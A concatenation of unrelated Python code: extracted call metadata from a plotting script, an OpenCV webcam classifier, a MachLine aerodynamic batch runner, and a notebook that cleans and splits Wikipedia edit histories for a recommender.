[((2392, 2422), 'PIL.Image.open', 'Image.open', (['"""new_york_map.png"""'], {}), "('new_york_map.png')\n", (2402, 2422), False, 'from PIL import Image\n'), ((2551, 2599), 'numpy.unique', 'np.unique', (["data['room_type']"], {'return_counts': '(True)'}), "(data['room_type'], return_counts=True)\n", (2560, 2599), True, 'import numpy as np\n'), ((2600, 2639), 'matplotlib.pyplot.title', 'plt.title', (['"""Distribution of Room Types"""'], {}), "('Distribution of Room Types')\n", (2609, 2639), True, 'import matplotlib.pyplot as plt\n'), ((2699, 2736), 'matplotlib.pyplot.barh', 'plt.barh', (['room_types', 'room_types_norm'], {}), '(room_types, room_types_norm)\n', (2707, 2736), True, 'import matplotlib.pyplot as plt\n'), ((2742, 2751), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (2749, 2751), True, 'import matplotlib.pyplot as plt\n'), ((2833, 2843), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2841, 2843), True, 'import matplotlib.pyplot as plt\n'), ((2895, 2953), 'numpy.unique', 'np.unique', (["data['neighbourhood_group']"], {'return_counts': '(True)'}), "(data['neighbourhood_group'], return_counts=True)\n", (2904, 2953), True, 'import numpy as np\n'), ((3192, 3241), 'matplotlib.pyplot.title', 'plt.title', (['"""Distribution of Neighbourhood Groups"""'], {}), "('Distribution of Neighbourhood Groups')\n", (3201, 3241), True, 'import matplotlib.pyplot as plt\n'), ((3261, 3382), 'matplotlib.pyplot.pie', 'plt.pie', (['n_groups_count'], {'labels': 'n_groups', 'explode': 'explode', 'autopct': '"""%1.1f%%"""', 'pctdistance': '(0.8)', 'colors': 'n_groups_colors'}), "(n_groups_count, labels=n_groups, explode=explode, autopct='%1.1f%%',\n pctdistance=0.8, colors=n_groups_colors)\n", (3268, 3382), True, 'import matplotlib.pyplot as plt\n'), ((3404, 3414), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (3412, 3414), True, 'import matplotlib.pyplot as plt\n'), ((3452, 3504), 'numpy.unique', 'np.unique', (["data['neighbourhood']"], {'return_counts': '(True)'}), "(data['neighbourhood'], return_counts=True)\n", (3461, 3504), True, 'import numpy as np\n'), ((4065, 4079), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (4077, 4079), True, 'import matplotlib.pyplot as plt\n'), ((4080, 4138), 'matplotlib.pyplot.title', 'plt.title', (['"""Most Popular Neighbourhoods and Average Price"""'], {}), "('Most Popular Neighbourhoods and Average Price')\n", (4089, 4138), True, 'import matplotlib.pyplot as plt\n'), ((4193, 4224), 'matplotlib.pyplot.subplots_adjust', 'plt.subplots_adjust', ([], {'bottom': '(0.2)'}), '(bottom=0.2)\n', (4212, 4224), True, 'import matplotlib.pyplot as plt\n'), ((4698, 4708), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (4706, 4708), True, 'import matplotlib.pyplot as plt\n'), ((5165, 5281), 'matplotlib.pyplot.hist', 'plt.hist', (['group_prices'], {'histtype': '"""barstacked"""', 'bins': '(25)', 'range': '(0, 500)', 'edgecolor': '"""white"""', 'color': 'n_groups_colors'}), "(group_prices, histtype='barstacked', bins=25, range=(0, 500),\n edgecolor='white', color=n_groups_colors)\n", (5173, 5281), True, 'import matplotlib.pyplot as plt\n'), ((5303, 5342), 'matplotlib.pyplot.legend', 'plt.legend', (['n_groups'], {'loc': '"""upper right"""'}), "(n_groups, loc='upper right')\n", (5313, 5342), True, 'import matplotlib.pyplot as plt\n'), ((5343, 5387), 'matplotlib.pyplot.title', 'plt.title', (['"""Distribution of Price per Night"""'], {}), "('Distribution of Price per Night')\n", (5352, 5387), True, 'import matplotlib.pyplot as plt\n'), ((5388, 
5404), 'matplotlib.pyplot.xlim', 'plt.xlim', (['(0)', '(500)'], {}), '(0, 500)\n', (5396, 5404), True, 'import matplotlib.pyplot as plt\n'), ((5405, 5435), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Number of places"""'], {}), "('Number of places')\n", (5415, 5435), True, 'import matplotlib.pyplot as plt\n'), ((5436, 5467), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Price range (USD)"""'], {}), "('Price range (USD)')\n", (5446, 5467), True, 'import matplotlib.pyplot as plt\n'), ((5468, 5478), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (5476, 5478), True, 'import matplotlib.pyplot as plt\n'), ((5605, 5672), 'numpy.zeros', 'np.zeros', (['(price_heatmap_bins, price_heatmap_bins)'], {'dtype': '"""float64"""'}), "((price_heatmap_bins, price_heatmap_bins), dtype='float64')\n", (5613, 5672), True, 'import numpy as np\n'), ((5695, 5762), 'numpy.zeros', 'np.zeros', (['(price_heatmap_bins, price_heatmap_bins)'], {'dtype': '"""float64"""'}), "((price_heatmap_bins, price_heatmap_bins), dtype='float64')\n", (5703, 5762), True, 'import numpy as np\n'), ((6268, 6305), 'numpy.clip', 'np.clip', (['price_heatmap_count', '(1)', 'None'], {}), '(price_heatmap_count, 1, None)\n', (6275, 6305), True, 'import numpy as np\n'), ((6362, 6407), 'matplotlib.pyplot.imshow', 'plt.imshow', (['new_york_img'], {'extent': 'image_extent'}), '(new_york_img, extent=image_extent)\n', (6372, 6407), True, 'import matplotlib.pyplot as plt\n'), ((6408, 6481), 'matplotlib.pyplot.imshow', 'plt.imshow', (['price_heatmap'], {'extent': 'image_extent', 'origin': '"""lower"""', 'alpha': '(0.9)'}), "(price_heatmap, extent=image_extent, origin='lower', alpha=0.9)\n", (6418, 6481), True, 'import matplotlib.pyplot as plt\n'), ((6482, 6496), 'matplotlib.pyplot.colorbar', 'plt.colorbar', ([], {}), '()\n', (6494, 6496), True, 'import matplotlib.pyplot as plt\n'), ((6497, 6541), 'matplotlib.pyplot.title', 'plt.title', (['"""Average Price per Night Heatmap"""'], {}), "('Average Price per Night Heatmap')\n", (6506, 6541), True, 'import matplotlib.pyplot as plt\n'), ((6542, 6552), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (6550, 6552), True, 'import matplotlib.pyplot as plt\n'), ((6577, 6622), 'matplotlib.pyplot.imshow', 'plt.imshow', (['new_york_img'], {'extent': 'image_extent'}), '(new_york_img, extent=image_extent)\n', (6587, 6622), True, 'import matplotlib.pyplot as plt\n'), ((6940, 6993), 'matplotlib.pyplot.legend', 'plt.legend', (['n_groups'], {'loc': '"""upper left"""', 'markerscale': '(5)'}), "(n_groups, loc='upper left', markerscale=5)\n", (6950, 6993), True, 'import matplotlib.pyplot as plt\n'), ((6994, 7032), 'matplotlib.pyplot.title', 'plt.title', (['"""Plot of Housing Locations"""'], {}), "('Plot of Housing Locations')\n", (7003, 7032), True, 'import matplotlib.pyplot as plt\n'), ((7033, 7056), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Longitude"""'], {}), "('Longitude')\n", (7043, 7056), True, 'import matplotlib.pyplot as plt\n'), ((7057, 7079), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Latitude"""'], {}), "('Latitude')\n", (7067, 7079), True, 'import matplotlib.pyplot as plt\n'), ((7080, 7090), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (7088, 7090), True, 'import matplotlib.pyplot as plt\n'), ((7110, 7155), 'matplotlib.pyplot.imshow', 'plt.imshow', (['new_york_img'], {'extent': 'image_extent'}), '(new_york_img, extent=image_extent)\n', (7120, 7155), True, 'import matplotlib.pyplot as plt\n'), ((7156, 7224), 'matplotlib.pyplot.hist2d', 'plt.hist2d', (["data['longitude']", 
"data['latitude']"], {'bins': '(150)', 'alpha': '(0.7)'}), "(data['longitude'], data['latitude'], bins=150, alpha=0.7)\n", (7166, 7224), True, 'import matplotlib.pyplot as plt\n'), ((7225, 7266), 'matplotlib.pyplot.title', 'plt.title', (['"""Heatmap of Housing Locations"""'], {}), "('Heatmap of Housing Locations')\n", (7234, 7266), True, 'import matplotlib.pyplot as plt\n'), ((7267, 7281), 'matplotlib.pyplot.colorbar', 'plt.colorbar', ([], {}), '()\n', (7279, 7281), True, 'import matplotlib.pyplot as plt\n'), ((7282, 7305), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Longitude"""'], {}), "('Longitude')\n", (7292, 7305), True, 'import matplotlib.pyplot as plt\n'), ((7306, 7328), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Latitude"""'], {}), "('Latitude')\n", (7316, 7328), True, 'import matplotlib.pyplot as plt\n'), ((7329, 7339), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (7337, 7339), True, 'import matplotlib.pyplot as plt\n'), ((7626, 7745), 'matplotlib.pyplot.hist', 'plt.hist', (['group_min_nights'], {'histtype': '"""barstacked"""', 'bins': '(20)', 'range': '(1, 21)', 'edgecolor': '"""white"""', 'color': 'n_groups_colors'}), "(group_min_nights, histtype='barstacked', bins=20, range=(1, 21),\n edgecolor='white', color=n_groups_colors)\n", (7634, 7745), True, 'import matplotlib.pyplot as plt\n'), ((7767, 7813), 'matplotlib.pyplot.title', 'plt.title', (['"""Minimum Number of Nights Required"""'], {}), "('Minimum Number of Nights Required')\n", (7776, 7813), True, 'import matplotlib.pyplot as plt\n'), ((7814, 7853), 'matplotlib.pyplot.legend', 'plt.legend', (['n_groups'], {'loc': '"""upper right"""'}), "(n_groups, loc='upper right')\n", (7824, 7853), True, 'import matplotlib.pyplot as plt\n'), ((7854, 7869), 'matplotlib.pyplot.xlim', 'plt.xlim', (['(1)', '(21)'], {}), '(1, 21)\n', (7862, 7869), True, 'import matplotlib.pyplot as plt\n'), ((7899, 7927), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Minimum Nights"""'], {}), "('Minimum Nights')\n", (7909, 7927), True, 'import matplotlib.pyplot as plt\n'), ((7928, 7958), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Number of Places"""'], {}), "('Number of Places')\n", (7938, 7958), True, 'import matplotlib.pyplot as plt\n'), ((7959, 7969), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (7967, 7969), True, 'import matplotlib.pyplot as plt\n'), ((8098, 8161), 'numpy.zeros', 'np.zeros', (['(num_reviews_bins, num_reviews_bins)'], {'dtype': '"""float64"""'}), "((num_reviews_bins, num_reviews_bins), dtype='float64')\n", (8106, 8161), True, 'import numpy as np\n'), ((8182, 8245), 'numpy.zeros', 'np.zeros', (['(num_reviews_bins, num_reviews_bins)'], {'dtype': '"""float64"""'}), "((num_reviews_bins, num_reviews_bins), dtype='float64')\n", (8190, 8245), True, 'import numpy as np\n'), ((8646, 8681), 'numpy.clip', 'np.clip', (['num_reviews_count', '(1)', 'None'], {}), '(num_reviews_count, 1, None)\n', (8653, 8681), True, 'import numpy as np\n'), ((8732, 8777), 'matplotlib.pyplot.imshow', 'plt.imshow', (['new_york_img'], {'extent': 'image_extent'}), '(new_york_img, extent=image_extent)\n', (8742, 8777), True, 'import matplotlib.pyplot as plt\n'), ((8778, 8849), 'matplotlib.pyplot.imshow', 'plt.imshow', (['num_reviews'], {'extent': 'image_extent', 'origin': '"""lower"""', 'alpha': '(0.9)'}), "(num_reviews, extent=image_extent, origin='lower', alpha=0.9)\n", (8788, 8849), True, 'import matplotlib.pyplot as plt\n'), ((8850, 8864), 'matplotlib.pyplot.colorbar', 'plt.colorbar', ([], {}), '()\n', (8862, 8864), True, 'import 
matplotlib.pyplot as plt\n'), ((8865, 8911), 'matplotlib.pyplot.title', 'plt.title', (['"""Average Number of Reviews Heatmap"""'], {}), "('Average Number of Reviews Heatmap')\n", (8874, 8911), True, 'import matplotlib.pyplot as plt\n'), ((8912, 8922), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (8920, 8922), True, 'import matplotlib.pyplot as plt\n'), ((988, 1023), 'csv.reader', 'csv.reader', (['csv_file'], {'delimiter': '""","""'}), "(csv_file, delimiter=',')\n", (998, 1023), False, 'import csv\n'), ((6764, 6911), 'matplotlib.pyplot.scatter', 'plt.scatter', (["data['longitude'][data['neighbourhood_group'] == group]", "data['latitude'][data['neighbourhood_group'] == group]"], {'s': '(2)', 'color': 'color'}), "(data['longitude'][data['neighbourhood_group'] == group], data[\n 'latitude'][data['neighbourhood_group'] == group], s=2, color=color)\n", (6775, 6911), True, 'import matplotlib.pyplot as plt\n'), ((7881, 7897), 'numpy.arange', 'np.arange', (['(1)', '(21)'], {}), '(1, 21)\n', (7890, 7897), True, 'import numpy as np\n'), ((4034, 4052), 'numpy.average', 'np.average', (['prices'], {}), '(prices)\n', (4044, 4052), True, 'import numpy as np\n')]
|
# -*- coding: utf-8 -*-
import cv2
import argparse
import time
import numpy as np
from training import Model
classes = []
FRAME_SIZE = 256
font = cv2.FONT_HERSHEY_SIMPLEX
switch = False
def detect(image):
crop_image = image[112:112 + FRAME_SIZE, 192:192 + FRAME_SIZE]
result = model.predict(crop_image)
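    # `result` is assumed to be a vector of per-class scores/probabilities whose
    # order matches the labels file loaded into `classes` at startup, so the
    # argmax index below maps straight back to a label string.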
index = np.argmax(result)
cv2.putText(image, classes[index], (192, 112), font, 1, (0, 255, 0), 2)
def crop_save(image):
crop_image = image[112 + 2:112 + FRAME_SIZE - 2, 192 + 2:192 + FRAME_SIZE - 2]
timestamp = str(time.time())
cv2.imwrite(
        'C:\\Users\\Akira.DESKTOP-HM7OVCC\\Desktop\\database\\' + timestamp + '.png',
crop_image,
(cv2.IMWRITE_PNG_COMPRESSION, 0)
)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
'--model_dir',
type=str,
help='folder contains model and labels'
)
args = parser.parse_args()
if args.model_dir:
model = Model()
try:
            model.load(file_path=args.model_dir + '\\model.h5')
            with open(args.model_dir + '\\labels.txt', 'r') as f:
for line in f.readlines():
classes.append(line.strip())
except OSError as e:
print("<--------------------Unable to open file-------------------->\n", e)
else:
cv2.namedWindow('Video')
            # Open the camera
capture = cv2.VideoCapture(0)
while capture.isOpened():
_, frame = capture.read()
cv2.rectangle(frame, (192, 112), (192 + FRAME_SIZE, 112 + FRAME_SIZE), (0, 255, 0), 2)
if switch:
detect(frame)
cv2.imshow('Video', frame)
key = cv2.waitKey(10)
if key == ord('z'):
switch = True
elif key == ord('d'):
switch = False
elif key == ord('s'):
crop_save(frame)
elif key == ord('q'): # exit
break
capture.release()
cv2.destroyWindow('Video')
else:
        print('Input not found\nTry "python predict.py -h" for more information')
|
[
"cv2.putText",
"argparse.ArgumentParser",
"numpy.argmax",
"cv2.waitKey",
"cv2.imwrite",
"time.time",
"cv2.VideoCapture",
"training.Model",
"cv2.destroyWindow",
"cv2.rectangle",
"cv2.imshow",
"cv2.namedWindow"
] |
[((326, 343), 'numpy.argmax', 'np.argmax', (['result'], {}), '(result)\n', (335, 343), True, 'import numpy as np\n'), ((348, 419), 'cv2.putText', 'cv2.putText', (['image', 'classes[index]', '(192, 112)', 'font', '(1)', '(0, 255, 0)', '(2)'], {}), '(image, classes[index], (192, 112), font, 1, (0, 255, 0), 2)\n', (359, 419), False, 'import cv2\n'), ((564, 703), 'cv2.imwrite', 'cv2.imwrite', (["('C:\\\\Users\\\\Akira.DESKTOP-HM7OVCC\\\\Desktop\\\\database\\\\' + timestamp + '.png')", 'crop_image', '(cv2.IMWRITE_PNG_COMPRESSION, 0)'], {}), "('C:\\\\Users\\\\Akira.DESKTOP-HM7OVCC\\\\Desktop\\\\database\\\\' +\n timestamp + '.png', crop_image, (cv2.IMWRITE_PNG_COMPRESSION, 0))\n", (575, 703), False, 'import cv2\n'), ((769, 794), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (792, 794), False, 'import argparse\n'), ((547, 558), 'time.time', 'time.time', ([], {}), '()\n', (556, 558), False, 'import time\n'), ((986, 993), 'training.Model', 'Model', ([], {}), '()\n', (991, 993), False, 'from training import Model\n'), ((1370, 1394), 'cv2.namedWindow', 'cv2.namedWindow', (['"""Video"""'], {}), "('Video')\n", (1385, 1394), False, 'import cv2\n'), ((1447, 1466), 'cv2.VideoCapture', 'cv2.VideoCapture', (['(0)'], {}), '(0)\n', (1463, 1466), False, 'import cv2\n'), ((2127, 2153), 'cv2.destroyWindow', 'cv2.destroyWindow', (['"""Video"""'], {}), "('Video')\n", (2144, 2153), False, 'import cv2\n'), ((1565, 1656), 'cv2.rectangle', 'cv2.rectangle', (['frame', '(192, 112)', '(192 + FRAME_SIZE, 112 + FRAME_SIZE)', '(0, 255, 0)', '(2)'], {}), '(frame, (192, 112), (192 + FRAME_SIZE, 112 + FRAME_SIZE), (0, \n 255, 0), 2)\n', (1578, 1656), False, 'import cv2\n'), ((1729, 1755), 'cv2.imshow', 'cv2.imshow', (['"""Video"""', 'frame'], {}), "('Video', frame)\n", (1739, 1755), False, 'import cv2\n'), ((1778, 1793), 'cv2.waitKey', 'cv2.waitKey', (['(10)'], {}), '(10)\n', (1789, 1793), False, 'import cv2\n')]
|
# This script automates running MachLine for the Weber and Brebner results
import numpy as np
import json
import subprocess
import time
import multiprocessing as mp
import os
# Record and print the time required to run MachLine
start_time = time.time()
def mach_iter(AoA, Node, formulation, freestream):
if formulation == "source-free":
formulation_adjusted = "source_free"
else:
formulation_adjusted = formulation
# Modify freestream velocities based on angle of attack
AoA_rad = float(AoA)*np.pi/180
x_flow = freestream * np.cos(AoA_rad)
z_flow = freestream * np.sin(AoA_rad)
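    # For illustration (values not used below): with AoA = 10 deg and freestream = 100,
    # AoA_rad ~= 0.1745, so x_flow ~= 100*cos(0.1745) ~= 98.48 and
    # z_flow ~= 100*sin(0.1745) ~= 17.36.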
# Identify filebases used throughout iterator
filebase = "dev/results/half_wing_swept_45_deg/"
output_filebase = filebase + "MachLine_Results/" + AoA + "_degrees_AoA/half_wing_A_" + Node + "_nodes_" + AoA + "_deg_AoA_" + formulation_adjusted
# Rewrite the input files based on angle of attack and node densities
dict1 = {
"flow": {
"freestream_velocity": [
x_flow,
0.0,
z_flow
]
},
"geometry": {
"file": filebase + "half_wing_A_meshes/half_wing_A_" + Node + "_nodes.vtk",
"mirror_about": "xz",
"singularity_order": {
"doublet": 1,
"source": 0
},
"wake_model": {
"wake_shedding_angle": 90.0,
"trefftz_distance": 10000.0,
"N_panels": 1
},
"reference": {
"area": 1.0
}
},
"solver": {
"formulation": formulation,
"control_point_offset": 1.1e-05
},
"post_processing" : {
},
"output": {
"body_file": output_filebase + "_formulation.vtk",
"wake_file": output_filebase + "_formulation_wake.vtk",
"control_point_file": output_filebase + "_control_points.vtk",
"report_file": "../../report.txt"
}
}
# Identify output file location
filename = AoA + "_deg_angle_of_attack_input.json"
inputfile = filebase + 'half_wing_A_swept_inputs/' + filename
# file_location = "dev/results/half_wing_swept_45deg/test/" + AoA + "_degree_AoA_test_file_" + Node + "_nodes.json"
with open(inputfile, "w") as output_file:
json.dump(dict1, output_file, indent=4)
print("\n***",Node, "node input file saved successfully ***\n")
# Run machline with current input file
# machline_command = "./machline.exe {0}".format(inputfile)
subprocess.call(["./machline.exe", inputfile])
## Main
input_conditions = "Swept_half_wing_conditions_input.json"
json_string = open(input_conditions).read()
json_vals = json.loads(json_string)
# Identify values to pass from input conditions file
Nodes_input = json_vals["geometry"]["nodes"]
AoA_list_input = json_vals["geometry"]["AoA list"]
freestream_velocity = json_vals["flow conditions"]["freestream velocity"]
formulation_input = json_vals["solver"]["formulation"]
# Identify number of CPU available to work with
# n_processors = mp.cpu_count()
n_processors = 8
Arguments = []
# Change the working directory to the main MachLine directory for execution
os.chdir("../../../")
# Call the machline iterator with the desired inputs
with mp.Pool(n_processors) as pool:
for form in formulation_input:
for AoA in AoA_list_input:
for node in Nodes_input:
Arguments.append((AoA, node, form, freestream_velocity))
    pool.starmap(mach_iter, Arguments)
    # close() must be called before join(), otherwise join() raises "Pool is still running"
    pool.close()
    pool.join()
# mach_iter(AoA_list_input, Nodes_input, formulation_input, freestream_velocity)
print("MachLine Iterator executed successfully in %s seconds" % "{:.4f}".format(time.time()-start_time))
|
[
"json.dump",
"json.loads",
"time.time",
"numpy.sin",
"subprocess.call",
"numpy.cos",
"multiprocessing.Pool",
"os.chdir"
] |
[((252, 263), 'time.time', 'time.time', ([], {}), '()\n', (261, 263), False, 'import time\n'), ((2816, 2839), 'json.loads', 'json.loads', (['json_string'], {}), '(json_string)\n', (2826, 2839), False, 'import json\n'), ((3313, 3334), 'os.chdir', 'os.chdir', (['"""../../../"""'], {}), "('../../../')\n", (3321, 3334), False, 'import os\n'), ((2642, 2688), 'subprocess.call', 'subprocess.call', (["['./machline.exe', inputfile]"], {}), "(['./machline.exe', inputfile])\n", (2657, 2688), False, 'import subprocess\n'), ((3394, 3415), 'multiprocessing.Pool', 'mp.Pool', (['n_processors'], {}), '(n_processors)\n', (3401, 3415), True, 'import multiprocessing as mp\n'), ((580, 595), 'numpy.cos', 'np.cos', (['AoA_rad'], {}), '(AoA_rad)\n', (586, 595), True, 'import numpy as np\n'), ((622, 637), 'numpy.sin', 'np.sin', (['AoA_rad'], {}), '(AoA_rad)\n', (628, 637), True, 'import numpy as np\n'), ((2412, 2451), 'json.dump', 'json.dump', (['dict1', 'output_file'], {'indent': '(4)'}), '(dict1, output_file, indent=4)\n', (2421, 2451), False, 'import json\n'), ((3828, 3839), 'time.time', 'time.time', ([], {}), '()\n', (3837, 3839), False, 'import time\n')]
|
# -*- coding: utf-8 -*-
# ---
# jupyter:
# jupytext:
# formats: ipynb,py:light
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.10.3
# kernelspec:
# display_name: wikirecs
# language: python
# name: wikirecs
# ---
# # WikiRecs
# A project to recommend the next Wikipedia article you might like to edit
# + init_cell=true
# %matplotlib inline
# %load_ext autoreload
# %autoreload 2
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
import logging
import wikipedia
import requests
import os
import wikirecs as wr
import implicit
from scipy.sparse import csr_matrix, csc_matrix, lil_matrix, coo_matrix
from tqdm.auto import tqdm
import umap
import pickle
import collections
import recommenders
import plotly.express as px
from pyarrow import feather
import itertools
from itables import show
import matplotlib
from implicit.nearest_neighbours import (
bm25_weight)
# -
from itables.javascript import load_datatables
load_datatables()
# + init_cell=true
pd.set_option('display.max_rows', 100)
pd.set_option('display.min_rows', 100)
# + init_cell=true
logging.basicConfig()
logging.getLogger().setLevel(logging.INFO)
# -
# # Assemble the complete histories
import os
all_histories = []
for fname in os.listdir('edit_histories_2021-05-28'):
if 'feather' in fname:
all_histories.append(feather.read_feather('edit_histories_2021-05-28/{}'.format(fname)))
all_histories = pd.concat(all_histories, ignore_index=True)
feather.write_feather(all_histories, "all_histories_2021-05-28.feather")
# %%time
all_histories = feather.read_feather("all_histories_2021-05-28.feather")
all_histories.columns
len(all_histories.pageid.unique())
# # Load all_histories (raw data), transform and split
# +
# %%time
all_histories = feather.read_feather("all_histories_2021-05-28.feather")
print("Length raw edit history data: {}".format(len(all_histories)))
# +
from pull_edit_histories import get_edit_history
## Add one particular user
cols = ['userid', 'user', 'pageid', 'title',
'timestamp', 'sizediff']
with open("../username.txt", "r") as file:
for username in file:
oneuser = get_edit_history(user=username.strip(),
latest_timestamp="2021-05-28T22:02:09Z",
earliest_timestamp="2020-05-28T22:02:09Z")
oneuser = pd.DataFrame(oneuser).loc[:,cols]
all_histories = pd.concat([all_histories, oneuser], ignore_index=True)
print("Length after adding users: {}".format(len(all_histories)))
# -
# ## EDA on raw histories
# Look at the distribution of edit counts
edit_counts = all_histories.groupby('userid').userid.count().values
plt.figure(figsize=(20,8))
plt.subplot(1,2,1)
sns.distplot(edit_counts,kde=False,bins=np.arange(0,20000,200))
plt.xlabel('Number of edits by user')
plt.subplot(1,2,2)
sns.distplot(edit_counts,kde=False,bins=np.arange(0,200,1))
plt.xlim([0,200])
plt.xlabel('Number of edits by user')
num_counts = len(edit_counts)
print("Median edit counts: %d" % np.median(edit_counts))
thres = 5
over_thres = np.sum(edit_counts > thres)
print("Number over threshold %d: %d (%.f%%)" % (thres, over_thres, 100*over_thres/num_counts))
# Most edits by user
all_histories.groupby(['userid','user']).userid.count().sort_values(ascending=False)
# Find the elbow in number of edits
plt.plot(all_histories.groupby(['userid','user']).userid.count().sort_values(ascending=False).values)
# plt.ylim([0,20000])
# +
# What are the most popular pages (edited by the most users)
page_popularity = all_histories.drop_duplicates(subset=['title','user']).groupby('title').count().user.sort_values()
pd.set_option('display.max_rows', 1000)
page_popularity.iloc[-1000:].iloc[::-1]
# -
# ## Clean data
# ### Remove consecutive edits and summarize runs
# +
# %%time
def remove_consecutive_edits(df):
c = dict(zip(df.columns, range(len(df.columns))))
keyfunc = lambda x: (x[c['userid']],x[c['pageid']])
first_and_last = lambda run: [run[0][c['userid']],
run[0][c['user']],
run[0][c['pageid']],
run[0][c['title']],
run[-1][c['timestamp']],
run[0][c['timestamp']],
sum([abs(r[c['sizediff']]) for r in run]),
len(run)]
d = df.values.tolist()
return pd.DataFrame([first_and_last(list(g)) for k,g in itertools.groupby(d, key=keyfunc)],
columns=['userid', 'user', 'pageid', 'title', 'first_timestamp', 'last_timestamp','sum_sizediff','consecutive_edits'])
clean_histories = remove_consecutive_edits(all_histories)
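# A minimal, self-contained illustration (not part of the pipeline) of the core
# idea above: itertools.groupby collapses *consecutive* items with the same
# (userid, pageid) key into a single run.
# >>> import itertools
# >>> edits = [(1, 'A'), (1, 'A'), (1, 'B'), (2, 'A'), (2, 'A')]
# >>> [(key, len(list(group))) for key, group in itertools.groupby(edits)]
# [((1, 'A'), 2), ((1, 'B'), 1), ((2, 'A'), 2)]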
# -
# ### Remove top N most popular pages
# +
# Get the top most popular pages
TOPN = 20
popularpages = all_histories.drop_duplicates(subset=['title','pageid','userid']).groupby(['title','pageid']).count().user.sort_values()[-TOPN:]
before_count = len(all_histories)
# -
popularpages
# Remove those popular pages
popular_pageids = popularpages.index.get_level_values(level='pageid').values
is_popular_page_edit = clean_histories.pageid.isin(popular_pageids)
clean_histories = clean_histories.loc[~is_popular_page_edit].copy()
all_histories = None
after_count = len(clean_histories)
print("%d edits (%.1f%%) were in top %d popular pages. Length after removing: %d" % (np.sum(is_popular_page_edit),
100* np.sum(is_popular_page_edit)/before_count,
TOPN,
after_count)
)
print("Number of unique page ids: {}".format(len(clean_histories.pageid.unique())))
# ### Remove users with too many or too few edits
MIN_EDITS = 5
MAX_EDITS = 10000
# Get user edit counts
all_user_edit_counts = clean_histories.groupby(['userid','user']).userid.count()
# +
# Remove users with too few edits
keep_user = all_user_edit_counts.values >= MIN_EDITS
# Remove users with too many edits
keep_user = keep_user & (all_user_edit_counts.values <= MAX_EDITS)
# Remove users with "bot" in the name
is_bot = ['bot' in username.lower() for username in all_user_edit_counts.index.get_level_values(1).values]
keep_user = keep_user & ~np.array(is_bot)
print("Keep %d users out of %d (%.1f%%)" % (np.sum(keep_user), len(all_user_edit_counts), 100*float(np.sum(keep_user))/len(all_user_edit_counts)))
# +
# Remove those users
userids_to_keep = all_user_edit_counts.index.get_level_values(0).values[keep_user]
clean_histories = clean_histories.loc[clean_histories.userid.isin(userids_to_keep)]
clean_histories = clean_histories.reset_index(drop=True)
# -
print("Length after removing users: {}".format(len(clean_histories)))
# %%time
# Save cleaned histories
feather.write_feather(clean_histories, '../clean_histories_2021-05-28.feather')
# ## Build lookup tables
# %%time
clean_histories = feather.read_feather('../clean_histories_2021-05-28.feather')
# +
# Page id to title and back
lookup = clean_histories.drop_duplicates(subset=['pageid']).loc[:,['pageid','title']]
p2t = dict(zip(lookup.pageid, lookup.title))
t2p = dict(zip(lookup.title, lookup.pageid))
# User id to name and back
lookup = clean_histories.drop_duplicates(subset=['userid']).loc[:,['userid','user']]
u2n = dict(zip(lookup.userid, lookup.user))
n2u = dict(zip(lookup.user, lookup.userid))
# +
# Page id and userid to index in co-occurrence matrix and back
pageids = np.sort(clean_histories.pageid.unique())
userids = np.sort(clean_histories.userid.unique())
p2i = {pageid:i for i, pageid in enumerate(pageids)}
u2i = {userid:i for i, userid in enumerate(userids)}
i2p = {v: k for k, v in p2i.items()}
i2u = {v: k for k, v in u2i.items()}
# +
# User name and page title to index and back
n2i = {k:u2i[v] for k, v in n2u.items() if v in u2i}
t2i = {k:p2i[v] for k, v in t2p.items() if v in p2i}
i2n = {v: k for k, v in n2i.items()}
i2t = {v: k for k, v in t2i.items()}
# -
wr.save_pickle((p2t, t2p, u2n, n2u, p2i, u2i, i2p, i2u, n2i, t2i, i2n, i2t), '../lookup_tables_2021-05-28.pickle')
wr.save_pickle((userids, pageids), '../users_and_pages_2021-05-28.pickle')
#
# ## Build test and training set
p2t, t2p, u2n, n2u, p2i, u2i, i2p, i2u, n2i, t2i, i2n, i2t = wr.load_pickle('../lookup_tables_2021-05-28.pickle')
userids, pageids = wr.load_pickle('../users_and_pages_2021-05-28.pickle')
# Make a test set from the most recent edit by each user
histories_test = clean_histories.groupby(['userid','user'],as_index=False).first()
# Subtract it from the rest to make the training set
histories_train = wr.dataframe_set_subtract(clean_histories, histories_test)
histories_train.reset_index(drop=True, inplace=True)
# Make a dev set from the second most recent edit by each user
histories_dev = histories_train.groupby(['userid','user'],as_index=False).first()
# Subtract it from the rest to make the final training set
histories_train = wr.dataframe_set_subtract(histories_train, histories_dev)
histories_train.reset_index(drop=True, inplace=True)
print("Length of test set: {}".format(len(histories_test)))
print("Length of dev set: {}".format(len(histories_dev)))
print("Length of training after removal of test: {}".format(len(histories_train)))
print("Number of pages in training set: {}".format(len(histories_train.pageid.unique())))
print("Number of users in training set: {}".format(len(histories_train.userid.unique())))
print("Number of pages with > 1 user editing: {}".format(np.sum(histories_train.drop_duplicates(subset=['title','user']).groupby('title').count().user > 1)))
feather.write_feather(histories_train, '../histories_train_2021-05-28.feather')
